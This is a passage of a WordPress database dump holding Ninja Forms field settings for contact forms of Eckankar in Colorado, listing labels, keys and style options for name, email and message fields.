\";s:5:\"value\";s:40:\"initiator-renee-wholey-denver-metro-west\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}'),(11725,290,'drawerDisabled','','drawerDisabled',''),(12048,376,'default','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Central Colorado / ECK Temple in Colorado Leadership Communications</span></span></span></strong></span></h3>\n','default','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Central Colorado / ECK Temple in Colorado Leadership Communications</span></span></span></strong></span></h3>\n'),(12047,376,'element_class','','element_class',''),(12046,376,'desc_text','','desc_text',''),(12045,376,'desc_pos','none','desc_pos','none'),(12044,376,'show_desc','0','show_desc','0'),(12043,376,'desc_el','div','desc_el','div'),(12042,376,'default_value','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Central Colorado /Â ECK Temple in Colorado Leadership Communications</span></span></span></strong></span></h3>\r\n','default_value','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Central Colorado /Â ECK Temple in Colorado Leadership Communications</span></span></span></strong></span></h3>\r\n'),(12041,376,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(12040,376,'label','Text','label','Text'),(12039,376,'type','html','type','html'),(12038,376,'order','0','order','0'),(12037,376,'editActive','','editActive',''),(12036,376,'objectDomain','fields','objectDomain','fields'),(12035,376,'objectType','Field','objectType','Field'),(12034,376,'drawerDisabled','','drawerDisabled',''),(12033,376,'field_key','html_20','field_key','html_20'),(12032,376,'field_label','Text','field_label','Text'),(9360,293,'key','select_the_person_you_would_like_to_contact_1613166297230','key','select_the_person_you_would_like_to_contact_1613166297230'),(9361,293,'container_class','one-half','container_class','one-half'),(9362,293,'drawerDisabled','','drawerDisabled',''),(9363,293,'parent_id','6','parent_id','6'),(9364,293,'field_label','Select the person you would like to email','field_label','Select the person you would like to email'),(9365,293,'field_key','listselect_101','field_key','listselect_101'),(9366,294,'objectType','Field','objectType','Field'),(9367,294,'objectDomain','fields','objectDomain','fields'),(9368,294,'editActive','','editActive',''),(9369,294,'order','8','order','8'),(9370,294,'type','textarea','type','textarea'),(9371,294,'label','Enter Your Message Here','label','Enter Your Message Here'),(9372,294,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(9373,294,'label_pos','above','label_pos','above'),(9374,294,'default_value','','default_value',''),(9375,294,'textarea_rte','0','textarea_rte','0'),(9376,294,'textarea_media','0','textarea_media','0'),(9377,294,'disable_rte_mobile','0','disable_rte_mobile','0'),(9378,294,'input_limit','','input_limit',''),(9379,294,'input_limit_type','char','input_limit_type','char'),(9380,294,'calc_auto_include','0','calc_auto_include','0'),(9381,294,'num_sort','0','num_sort','0'),(9382,294,'admin_label','','admin_label',''),(9383,294,'show_help','0','show_help','0'),(9384,294,'help_text','','help_text',''),(9385,294,'show_desc','0','show_desc','0'),(9386,294,'desc_pos','none','desc_pos','none'),(9387,294,'desc_text','','desc_text',''),(9388,294,'element_class','','element_class',''),(9389,294,'required','1','required','1'),(9390,294,'default','','default',''),(9391,294,'key','textarea_102','key','textarea_102'),(9392,294,'placeholder','','placeholder',''),(9393,294,'container_class','','container_class',''),(9394,294,'manual_key','','manual_key',''),(9395,294,'parent_id','6','parent_id','6'),(9396,294,'field_label','Enter Your Message Here','field_label','Enter Your Message Here'),(9397,294,'field_key','textarea_102','field_key','textarea_102'),(9398,294,'value','','value',''),(17599,634,'default','This site is protected by reCAPTCHA and the Google    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.','default','This site is protected by reCAPTCHA and the Google    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.'),(17598,634,'type','html','type','html'),(17597,634,'label','HTML','label','HTML'),(17596,634,'idAttribute','id','idAttribute','id'),(17594,634,'editActive','','editActive',''),(17595,634,'order','9','order','9'),(17593,633,'key','html_1663800583849','key','html_1663800583849'),(17592,633,'element_class','','element_class',''),(17591,633,'container_class','','container_class',''),(17590,633,'default','','default',''),(17589,633,'label','HTML','label','HTML'),(17588,633,'type','html','type','html'),(17587,633,'idAttribute','id','idAttribute','id'),(17585,633,'editActive','','editActive',''),(17586,633,'order','11','order','11'),(17584,632,'drawerDisabled','','drawerDisabled',''),(9418,296,'objectType','Field','objectType','Field'),(9419,296,'objectDomain','fields','objectDomain','fields'),(9420,296,'editActive','','editActive',''),(9421,296,'order','10','order','10'),(9422,296,'type','submit','type','submit'),(9423,296,'label','Submit','label','Submit'),(9424,296,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(9425,296,'show_help','0','show_help','0'),(9426,296,'help_text','','help_text',''),(9427,296,'show_desc','0','show_desc','0'),(9428,296,'desc_pos','none','desc_pos','none'),(9429,296,'desc_text','','desc_text',''),(9430,296,'processing_label','Processing','processing_label','Processing'),(9431,296,'element_class','','element_class',''),(9432,296,'key','submit_104','key','submit_104'),(9433,296,'container_class','','container_class',''),(9434,296,'parent_id','6','parent_id','6'),(9435,296,'field_label','Submit','field_label','Submit'),(9436,296,'field_key','submit_104','field_key','submit_104'),(9437,36,'drawerDisabled','','drawerDisabled',''),(9439,297,'label','Name','label','Name'),(9440,297,'key','name','key','name'),(9441,297,'parent_id','33','parent_id','33'),(9442,297,'type','textbox','type','textbox'),(9443,297,'created_at','2016-08-24 16:39:20','created_at','2016-08-24 16:39:20'),(9444,297,'label_pos','above','label_pos','above'),(9445,297,'required','1','required','1'),(9446,297,'order','1','order','1'),(9447,297,'placeholder','','placeholder',''),(9448,297,'default','','default',''),(9449,297,'wrapper_class','','wrapper_class',''),(9450,297,'element_class','','element_class',''),(9451,297,'objectType','Field','objectType','Field'),(9452,297,'objectDomain','fields','objectDomain','fields'),(9453,297,'editActive','','editActive',''),(9454,297,'container_class','','container_class',''),(9455,297,'input_limit','','input_limit',''),(9456,297,'input_limit_type','characters','input_limit_type','characters'),(9457,297,'input_limit_msg','Character(s) left','input_limit_msg','Character(s) left'),(9458,297,'manual_key','','manual_key',''),(9459,297,'disable_input','','disable_input',''),(9460,297,'admin_label','','admin_label',''),(9461,297,'help_text','','help_text',''),(9462,297,'desc_text','','desc_text',''),(9463,297,'disable_browser_autocomplete','','disable_browser_autocomplete',''),(9464,297,'mask','','mask',''),(9465,297,'custom_mask','','custom_mask',''),(9466,297,'wrap_styles_background-color','','wrap_styles_background-color',''),(9467,297,'wrap_styles_border','','wrap_styles_border',''),(9468,297,'wrap_styles_border-style','','wrap_styles_border-style',''),(9469,297,'wrap_styles_border-color','','wrap_styles_border-color',''),(9470,297,'wrap_styles_color','','wrap_styles_color',''),(9471,297,'wrap_styles_height','','wrap_styles_height',''),(9472,297,'wrap_styles_width','','wrap_styles_width',''),(9473,297,'wrap_styles_font-size','','wrap_styles_font-size',''),(9474,297,'wrap_styles_margin','','wrap_styles_margin',''),(9475,297,'wrap_styles_padding','','wrap_styles_padding',''),(9476,297,'wrap_styles_display','','wrap_styles_display',''),(9477,297,'wrap_styles_float','','wrap_styles_float',''),(9478,297,'wrap_styles_show_advanced_css','0','wrap_styles_show_advanced_css','0'),(9479,297,'wrap_styles_advanced','','wrap_styles_advanced',''),(9480,297,'label_styles_background-color','','label_styles_background-color',''),(9481,297,'label_styles_border','','label_styles_border',''),(9482,297,'label_styles_border-style','','label_styles_border-style',''),(9483,297,'label_styles_border-color','','label_styles_border-color',''),(9484,297,'label_styles_color','','label_styles_color',''),(9485,297,'label_styles_height','','label_styles_height',''),(9486,297,'label_styles_width','','label_styles_width',''),(9487,297,'label_styles_font-size','','label_styles_font-size',''),(9488,297,'label_styles_margin','','label_styles_margin',''),(9489,297,'label_styles_padding','','label_styles_padding',''),(9490,297,'label_styles_display','','label_styles_display',''),(9491,297,'label_styles_float','','label_styles_float',''),(9492,297,'label_styles_show_advanced_css','0','label_styles_show_advanced_css','0'),(9493,297,'label_styles_advanced','','label_styles_advanced',''),(9494,297,'element_styles_background-color','','element_styles_background-color',''),(9495,297,'element_styles_border','','element_styles_border',''),(9496,297,'element_styles_border-style','','element_styles_border-style',''),(9497,297,'element_styles_border-color','','element_styles_border-color',''),(9498,297,'element_styles_color','','element_styles_color',''),(9499,297,'element_styles_height','','element_styles_height',''),(9500,297,'element_styles_width','','element_styles_width',''),(9501,297,'element_styles_font-size','','element_styles_font-size',''),(9502,297,'element_styles_margin','','element_styles_margin',''),(9503,297,'element_styles_padding','','element_styles_padding',''),(9504,297,'element_styles_display','','element_styles_display',''),(9505,297,'element_styles_float','','element_styles_float',''),(9506,297,'element_styles_show_advanced_css','0','element_styles_show_advanced_css','0'),(9507,297,'element_styles_advanced','','element_styles_advanced',''),(9508,297,'cellcid','c3277','cellcid','c3277'),(9509,298,'label','Email','label','Email'),(9510,298,'key','email','key','email'),(9511,298,'parent_id','33','parent_id','33'),(9512,298,'type','email','type','email'),(9513,298,'created_at','2016-08-24 16:39:20','created_at','2016-08-24 16:39:20'),(9514,298,'label_pos','above','label_pos','above'),(9515,298,'required','1','required','1'),(9516,298,'order','2','order','2'),(9517,298,'placeholder','','placeholder',''),(9518,298,'default','','default',''),(9519,298,'wrapper_class','','wrapper_class',''),(9520,298,'element_class','','element_class',''),(9521,298,'objectType','Field','objectType','Field'),(9522,298,'objectDomain','fields','objectDomain','fields'),(9523,298,'editActive','','editActive',''),(9524,298,'container_class','','container_class',''),(9525,298,'admin_label','','admin_label',''),(9526,298,'help_text','','help_text',''),(9527,298,'desc_text','','desc_text',''),(9528,298,'wrap_styles_background-color','','wrap_styles_background-color',''),(9529,298,'wrap_styles_border','','wrap_styles_border',''),(9530,298,'wrap_styles_border-style','','wrap_styles_border-style',''),(9531,298,'wrap_styles_border-color','','wrap_styles_border-color',''),(9532,298,'wrap_styles_color','','wrap_styles_color',''),(9533,298,'wrap_styles_height','','wrap_styles_height',''),(9534,298,'wrap_styles_width','','wrap_styles_width',''),(9535,298,'wrap_styles_font-size','','wrap_styles_font-size',''),(9536,298,'wrap_styles_margin','','wrap_styles_margin',''),(9537,298,'wrap_styles_padding','','wrap_styles_padding',''),(9538,298,'wrap_styles_display','','wrap_styles_display',''),(9539,298,'wrap_styles_float','','wrap_styles_float',''),(9540,298,'wrap_styles_show_advanced_css','0','wrap_styles_show_advanced_css','0'),(9541,298,'wrap_styles_advanced','','wrap_styles_advanced',''),(9542,298,'label_styles_background-color','','label_styles_background-color',''),(9543,298,'label_styles_border','','label_styles_border',''),(9544,298,'label_styles_border-style','','label_styles_border-style',''),(9545,298,'label_styles_border-color','','label_styles_border-color',''),(9546,298,'label_styles_color','','label_styles_color',''),(9547,298,'label_styles_height','','label_styles_height',''),(9548,298,'label_styles_width','','label_styles_width',''),(9549,298,'label_styles_font-size','','label_styles_font-size',''),(9550,298,'label_styles_margin','','label_styles_margin',''),(9551,298,'label_styles_padding','','label_styles_padding',''),(9552,298,'label_styles_display','','label_styles_display',''),(9553,298,'label_styles_float','','label_styles_float',''),(9554,298,'label_styles_show_advanced_css','0','label_styles_show_advanced_css','0'),(9555,298,'label_styles_advanced','','label_styles_advanced',''),(9556,298,'element_styles_background-color','','element_styles_background-color',''),(9557,298,'element_styles_border','','element_styles_border',''),(9558,298,'element_styles_border-style','','element_styles_border-style',''),(9559,298,'element_styles_border-color','','element_styles_border-color',''),(9560,298,'element_styles_color','','element_styles_color',''),(9561,298,'element_styles_height','','element_styles_height',''),(9562,298,'element_styles_width','','element_styles_width',''),(9563,298,'element_styles_font-size','','element_styles_font-size',''),(9564,298,'element_styles_margin','','element_styles_margin',''),(9565,298,'element_styles_padding','','element_styles_padding',''),(9566,298,'element_styles_display','','element_styles_display',''),(9567,298,'element_styles_float','','element_styles_float',''),(9568,298,'element_styles_show_advanced_css','0','element_styles_show_advanced_css','0'),(9569,298,'element_styles_advanced','','element_styles_advanced',''),(9570,298,'cellcid','c3281','cellcid','c3281'),(9571,299,'label','Message','label','Message'),(9572,299,'key','message','key','message'),(9573,299,'parent_id','33','parent_id','33'),(9574,299,'type','textarea','type','textarea'),(9575,299,'created_at','2016-08-24 16:39:20','created_at','2016-08-24 16:39:20'),(9576,299,'label_pos','above','label_pos','above'),(9577,299,'required','1','required','1'),(9578,299,'order','3','order','3'),(9579,299,'placeholder','','placeholder',''),(9580,299,'default','','default',''),(9581,299,'wrapper_class','','wrapper_class',''),(9582,299,'element_class','','element_class',''),(9583,299,'objectType','Field','objectType','Field'),(9584,299,'objectDomain','fields','objectDomain','fields'),(9585,299,'editActive','','editActive',''),(9586,299,'container_class','','container_class',''),(9587,299,'input_limit','','input_limit',''),(9588,299,'input_limit_type','characters','input_limit_type','characters'),(9589,299,'input_limit_msg','Character(s) left','input_limit_msg','Character(s) left'),(9590,299,'manual_key','','manual_key',''),(9591,299,'disable_input','','disable_input',''),(9592,299,'admin_label','','admin_label',''),(9593,299,'help_text','','help_text',''),(9594,299,'desc_text','','desc_text',''),(9595,299,'disable_browser_autocomplete','','disable_browser_autocomplete',''),(9596,299,'textarea_rte','','textarea_rte',''),(9597,299,'disable_rte_mobile','','disable_rte_mobile',''),(9598,299,'textarea_media','','textarea_media',''),(9599,299,'wrap_styles_background-color','','wrap_styles_background-color',''),(9600,299,'wrap_styles_border','','wrap_styles_border',''),(9601,299,'wrap_styles_border-style','','wrap_styles_border-style',''),(9602,299,'wrap_styles_border-color','','wrap_styles_border-color',''),(9603,299,'wrap_styles_color','','wrap_styles_color',''),(9604,299,'wrap_styles_height','','wrap_styles_height',''),(9605,299,'wrap_styles_width','','wrap_styles_width',''),(9606,299,'wrap_styles_font-size','','wrap_styles_font-size',''),(9607,299,'wrap_styles_margin','','wrap_styles_margin',''),(9608,299,'wrap_styles_padding','','wrap_styles_padding',''),(9609,299,'wrap_styles_display','','wrap_styles_display',''),(9610,299,'wrap_styles_float','','wrap_styles_float',''),(9611,299,'wrap_styles_show_advanced_css','0','wrap_styles_show_advanced_css','0'),(9612,299,'wrap_styles_advanced','','wrap_styles_advanced',''),(9613,299,'label_styles_background-color','','label_styles_background-color',''),(9614,299,'label_styles_border','','label_styles_border',''),(9615,299,'label_styles_border-style','','label_styles_border-style',''),(9616,299,'label_styles_border-color','','label_styles_border-color',''),(9617,299,'label_styles_color','','label_styles_color',''),(9618,299,'label_styles_height','','label_styles_height',''),(9619,299,'label_styles_width','','label_styles_width',''),(9620,299,'label_styles_font-size','','label_styles_font-size',''),(9621,299,'label_styles_margin','','label_styles_margin',''),(9622,299,'label_styles_padding','','label_styles_padding',''),(9623,299,'label_styles_display','','label_styles_display',''),(9624,299,'label_styles_float','','label_styles_float',''),(9625,299,'label_styles_show_advanced_css','0','label_styles_show_advanced_css','0'),(9626,299,'label_styles_advanced','','label_styles_advanced',''),(9627,299,'element_styles_background-color','','element_styles_background-color',''),(9628,299,'element_styles_border','','element_styles_border',''),(9629,299,'element_styles_border-style','','element_styles_border-style',''),(9630,299,'element_styles_border-color','','element_styles_border-color',''),(9631,299,'element_styles_color','','element_styles_color',''),(9632,299,'element_styles_height','','element_styles_height',''),(9633,299,'element_styles_width','','element_styles_width',''),(9634,299,'element_styles_font-size','','element_styles_font-size',''),(9635,299,'element_styles_margin','','element_styles_margin',''),(9636,299,'element_styles_padding','','element_styles_padding',''),(9637,299,'element_styles_display','','element_styles_display',''),(9638,299,'element_styles_float','','element_styles_float',''),(9639,299,'element_styles_show_advanced_css','0','element_styles_show_advanced_css','0'),(9640,299,'element_styles_advanced','','element_styles_advanced',''),(9641,299,'cellcid','c3284','cellcid','c3284'),(9642,300,'label','Submit','label','Submit'),(9643,300,'key','submit','key','submit'),(9644,300,'parent_id','33','parent_id','33'),(9645,300,'type','submit','type','submit'),(9646,300,'created_at','2016-08-24 16:39:20','created_at','2016-08-24 16:39:20'),(9647,300,'processing_label','Processing','processing_label','Processing'),(9648,300,'order','5','order','5'),(9649,300,'objectType','Field','objectType','Field'),(9650,300,'objectDomain','fields','objectDomain','fields'),(9651,300,'editActive','','editActive',''),(9652,300,'container_class','','container_class',''),(9653,300,'element_class','','element_class',''),(9654,300,'wrap_styles_background-color','','wrap_styles_background-color',''),(9655,300,'wrap_styles_border','','wrap_styles_border',''),(9656,300,'wrap_styles_border-style','','wrap_styles_border-style',''),(9657,300,'wrap_styles_border-color','','wrap_styles_border-color',''),(9658,300,'wrap_styles_color','','wrap_styles_color',''),(9659,300,'wrap_styles_height','','wrap_styles_height',''),(9660,300,'wrap_styles_width','','wrap_styles_width',''),(9661,300,'wrap_styles_font-size','','wrap_styles_font-size',''),(9662,300,'wrap_styles_margin','','wrap_styles_margin',''),(9663,300,'wrap_styles_padding','','wrap_styles_padding',''),(9664,300,'wrap_styles_display','','wrap_styles_display',''),(9665,300,'wrap_styles_float','','wrap_styles_float',''),(9666,300,'wrap_styles_show_advanced_css','0','wrap_styles_show_advanced_css','0'),(9667,300,'wrap_styles_advanced','','wrap_styles_advanced',''),(9668,300,'label_styles_background-color','','label_styles_background-color',''),(9669,300,'label_styles_border','','label_styles_border',''),(9670,300,'label_styles_border-style','','label_styles_border-style',''),(9671,300,'label_styles_border-color','','label_styles_border-color',''),(9672,300,'label_styles_color','','label_styles_color',''),(9673,300,'label_styles_height','','label_styles_height',''),(9674,300,'label_styles_width','','label_styles_width',''),(9675,300,'label_styles_font-size','','label_styles_font-size',''),(9676,300,'label_styles_margin','','label_styles_margin',''),(9677,300,'label_styles_padding','','label_styles_padding',''),(9678,300,'label_styles_display','','label_styles_display',''),(9679,300,'label_styles_float','','label_styles_float',''),(9680,300,'label_styles_show_advanced_css','0','label_styles_show_advanced_css','0'),(9681,300,'label_styles_advanced','','label_styles_advanced',''),(9682,300,'element_styles_background-color','','element_styles_background-color',''),(9683,300,'element_styles_border','','element_styles_border',''),(9684,300,'element_styles_border-style','','element_styles_border-style',''),(9685,300,'element_styles_border-color','','element_styles_border-color',''),(9686,300,'element_styles_color','','element_styles_color',''),(9687,300,'element_styles_height','','element_styles_height',''),(9688,300,'element_styles_width','','element_styles_width',''),(9689,300,'element_styles_font-size','','element_styles_font-size',''),(9690,300,'element_styles_margin','','element_styles_margin',''),(9691,300,'element_styles_padding','','element_styles_padding',''),(9692,300,'element_styles_display','','element_styles_display',''),(9693,300,'element_styles_float','','element_styles_float',''),(9694,300,'element_styles_show_advanced_css','0','element_styles_show_advanced_css','0'),(9695,300,'element_styles_advanced','','element_styles_advanced',''),(9696,300,'submit_element_hover_styles_background-color','','submit_element_hover_styles_background-color',''),(9697,300,'submit_element_hover_styles_border','','submit_element_hover_styles_border',''),(9698,300,'submit_element_hover_styles_border-style','','submit_element_hover_styles_border-style',''),(9699,300,'submit_element_hover_styles_border-color','','submit_element_hover_styles_border-color',''),(9700,300,'submit_element_hover_styles_color','','submit_element_hover_styles_color',''),(9701,300,'submit_element_hover_styles_height','','submit_element_hover_styles_height',''),(9702,300,'submit_element_hover_styles_width','','submit_element_hover_styles_width',''),(9703,300,'submit_element_hover_styles_font-size','','submit_element_hover_styles_font-size',''),(9704,300,'submit_element_hover_styles_margin','','submit_element_hover_styles_margin',''),(9705,300,'submit_element_hover_styles_padding','','submit_element_hover_styles_padding',''),(9706,300,'submit_element_hover_styles_display','','submit_element_hover_styles_display',''),(9707,300,'submit_element_hover_styles_float','','submit_element_hover_styles_float',''),(9708,300,'submit_element_hover_styles_show_advanced_css','0','submit_element_hover_styles_show_advanced_css','0'),(9709,300,'submit_element_hover_styles_advanced','','submit_element_hover_styles_advanced',''),(9710,300,'cellcid','c3287','cellcid','c3287'),(9711,301,'editActive','','editActive',''),(9712,301,'field_label','Text','field_label','Text'),(9713,301,'field_key','html_267','field_key','html_267'),(9714,301,'container_class','','container_class',''),(9715,301,'drawerDisabled','','drawerDisabled',''),(9716,301,'type','html','type','html'),(9717,301,'order','1','order','1'),(9718,301,'fav_id','','fav_id',''),(9719,301,'def_id','','def_id',''),(9720,301,'label','Text','label','Text'),(9721,301,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(9722,301,'default_value','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Eckankar In Colorado Contact Form</span></span></span></strong></span></h3>\r\nPlease Enter Your Information Below','default_value','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Eckankar In Colorado Contact Form</span></span></span></strong></span></h3>\r\nPlease Enter Your Information Below'),(9723,301,'desc_el','div','desc_el','div'),(9724,301,'show_desc','0','show_desc','0'),(9725,301,'desc_pos','none','desc_pos','none'),(9726,301,'desc_text','','desc_text',''),(9727,301,'element_class','','element_class',''),(9728,301,'default','<h3><span style=\"color: #23507d;\"><strong>Eckankar in Colorado<br>Youth and Families contact form</strong></span></h3>  <p>Please Enter Your Information Below</p>','default','<h3><span style=\"color: #23507d;\"><strong>Eckankar in Colorado<br>Youth and Families contact form</strong></span></h3>  <p>Please Enter Your Information Below</p>'),(9729,301,'key','html_267','key','html_267'),(9730,301,'parent_id','13','parent_id','13'),(9731,302,'field_label','First Name','field_label','First Name'),(9732,302,'field_key','textbox_268','field_key','textbox_268'),(9733,302,'default','','default',''),(9734,302,'container_class','one-third first','container_class','one-third first'),(9735,302,'manual_key','','manual_key',''),(9736,302,'custom_mask','','custom_mask',''),(9737,302,'custom_name_attribute','','custom_name_attribute',''),(9738,302,'editActive','','editActive',''),(9739,302,'type','textbox','type','textbox'),(9740,302,'order','2','order','2'),(9741,302,'fav_id','','fav_id',''),(9742,302,'def_id','6','def_id','6'),(9743,302,'label','First Name','label','First Name'),(9744,302,'label_pos','above','label_pos','above'),(9745,302,'mask','','mask',''),(9746,302,'datepicker','0','datepicker','0'),(9747,302,'first_name','1','first_name','1'),(9748,302,'last_name','0','last_name','0'),(9749,302,'from_name','0','from_name','0'),(9750,302,'user_info_field_group','1','user_info_field_group','1'),(9751,302,'show_help','0','show_help','0'),(9752,302,'help_text','','help_text',''),(9753,302,'calc_auto_include','0','calc_auto_include','0'),(9754,302,'calc_option','0','calc_option','0'),(9755,302,'placeholder','','placeholder',''),(9756,302,'user_address_1','','user_address_1',''),(9757,302,'user_address_2','','user_address_2',''),(9758,302,'user_city','','user_city',''),(9759,302,'user_zip','','user_zip',''),(9760,302,'user_phone','','user_phone',''),(9761,302,'user_email','','user_email',''),(9762,302,'disable_input','0','disable_input','0'),(9763,302,'input_limit','','input_limit',''),(9764,302,'input_limit_type','char','input_limit_type','char'),(9765,302,'input_limit_msg','','input_limit_msg',''),(9766,302,'user_state','0','user_state','0'),(9767,302,'autocomplete_off','0','autocomplete_off','0'),(9768,302,'num_sort','0','num_sort','0'),(9769,302,'admin_label','','admin_label',''),(9770,302,'user_info_field_group_name','','user_info_field_group_name',''),(9771,302,'user_info_field_group_custom','','user_info_field_group_custom',''),(9772,302,'show_desc','0','show_desc','0'),(9773,302,'desc_pos','none','desc_pos','none'),(9774,302,'desc_text','','desc_text',''),(9775,302,'element_class','','element_class',''),(9776,302,'required','1','required','1'),(9777,302,'key','textbox_268','key','textbox_268'),(9778,302,'parent_id','13','parent_id','13'),(9779,302,'personally_identifiable','','personally_identifiable',''),(9780,302,'value','','value',''),(9781,303,'type','lastname','type','lastname'),(9782,303,'order','3','order','3'),(9783,303,'fav_id','','fav_id',''),(9784,303,'def_id','7','def_id','7'),(9785,303,'label','Last Name','label','Last Name'),(9786,303,'label_pos','above','label_pos','above'),(9787,303,'mask','','mask',''),(9788,303,'datepicker','0','datepicker','0'),(9789,303,'first_name','0','first_name','0'),(9790,303,'from_name','0','from_name','0'),(9791,303,'user_info_field_group','1','user_info_field_group','1'),(9792,303,'show_help','0','show_help','0'),(9793,303,'help_text','','help_text',''),(9794,303,'calc_auto_include','0','calc_auto_include','0'),(9795,303,'calc_option','0','calc_option','0'),(9796,303,'placeholder','','placeholder',''),(9797,303,'user_address_1','','user_address_1',''),(9798,303,'user_address_2','','user_address_2',''),(9799,303,'user_city','','user_city',''),(9800,303,'user_zip','','user_zip',''),(9801,303,'user_phone','','user_phone',''),(9802,303,'user_email','','user_email',''),(9803,303,'disable_input','0','disable_input','0'),(9804,303,'input_limit','','input_limit',''),(9805,303,'input_limit_type','char','input_limit_type','char'),(9806,303,'input_limit_msg','','input_limit_msg',''),(9807,303,'user_state','0','user_state','0'),(9808,303,'autocomplete_off','0','autocomplete_off','0'),(9809,303,'num_sort','0','num_sort','0'),(9810,303,'admin_label','','admin_label',''),(9811,303,'user_info_field_group_name','','user_info_field_group_name',''),(9812,303,'user_info_field_group_custom','','user_info_field_group_custom',''),(9813,303,'show_desc','0','show_desc','0'),(9814,303,'desc_pos','none','desc_pos','none'),(9815,303,'desc_text','','desc_text',''),(9816,303,'element_class','','element_class',''),(9817,303,'required','1','required','1'),(9818,303,'key','lastname_269','key','lastname_269'),(9819,303,'parent_id','13','parent_id','13'),(9820,303,'editActive','','editActive',''),(9821,303,'field_label','Last Name','field_label','Last Name'),(9822,303,'field_key','lastname_269','field_key','lastname_269'),(9823,303,'default','','default',''),(9824,303,'container_class','one-third','container_class','one-third'),(9825,303,'custom_name_attribute','lname','custom_name_attribute','lname'),(9826,303,'personally_identifiable','1','personally_identifiable','1'),(9827,303,'value','','value',''),(9828,304,'type','email','type','email'),(9829,304,'order','4','order','4'),(9830,304,'fav_id','','fav_id',''),(9831,304,'def_id','14','def_id','14'),(9832,304,'label','Email','label','Email'),(9833,304,'label_pos','above','label_pos','above'),(9834,304,'mask','','mask',''),(9835,304,'datepicker','0','datepicker','0'),(9836,304,'first_name','0','first_name','0'),(9837,304,'last_name','0','last_name','0'),(9838,304,'from_name','0','from_name','0'),(9839,304,'user_address_1','0','user_address_1','0'),(9840,304,'user_address_2','0','user_address_2','0'),(9841,304,'user_city','0','user_city','0'),(9842,304,'user_zip','0','user_zip','0'),(9843,304,'user_phone','0','user_phone','0'),(9844,304,'user_info_field_group','1','user_info_field_group','1'),(9845,304,'show_help','0','show_help','0'),(9846,304,'help_text','','help_text',''),(9847,304,'calc_auto_include','0','calc_auto_include','0'),(9848,304,'calc_option','0','calc_option','0'),(9849,304,'placeholder','','placeholder',''),(9850,304,'disable_input','0','disable_input','0'),(9851,304,'input_limit','','input_limit',''),(9852,304,'input_limit_type','char','input_limit_type','char'),(9853,304,'input_limit_msg','','input_limit_msg',''),(9854,304,'user_state','0','user_state','0'),(9855,304,'autocomplete_off','0','autocomplete_off','0'),(9856,304,'num_sort','0','num_sort','0'),(9857,304,'admin_label','','admin_label',''),(9858,304,'user_info_field_group_name','','user_info_field_group_name',''),(9859,304,'user_info_field_group_custom','','user_info_field_group_custom',''),(9860,304,'show_desc','0','show_desc','0'),(9861,304,'desc_pos','none','desc_pos','none'),(9862,304,'desc_text','','desc_text',''),(9863,304,'element_class','','element_class',''),(9864,304,'required','1','required','1'),(9865,304,'key','email_270','key','email_270'),(9866,304,'parent_id','13','parent_id','13'),(9867,304,'editActive','','editActive',''),(9868,304,'field_label','Email','field_label','Email'),(9869,304,'field_key','email_270','field_key','email_270'),(9870,304,'default','','default',''),(9871,304,'container_class','one-third','container_class','one-third'),(9872,304,'custom_name_attribute','email','custom_name_attribute','email'),(9873,304,'personally_identifiable','1','personally_identifiable','1'),(9874,304,'value','','value',''),(9875,305,'type','hr','type','hr'),(9876,305,'order','5','order','5'),(9877,305,'fav_id','','fav_id',''),(9878,305,'def_id','','def_id',''),(9879,305,'label','hr','label','hr'),(9880,305,'input_limit_msg','character(s) left','input_limit_msg','character(s) 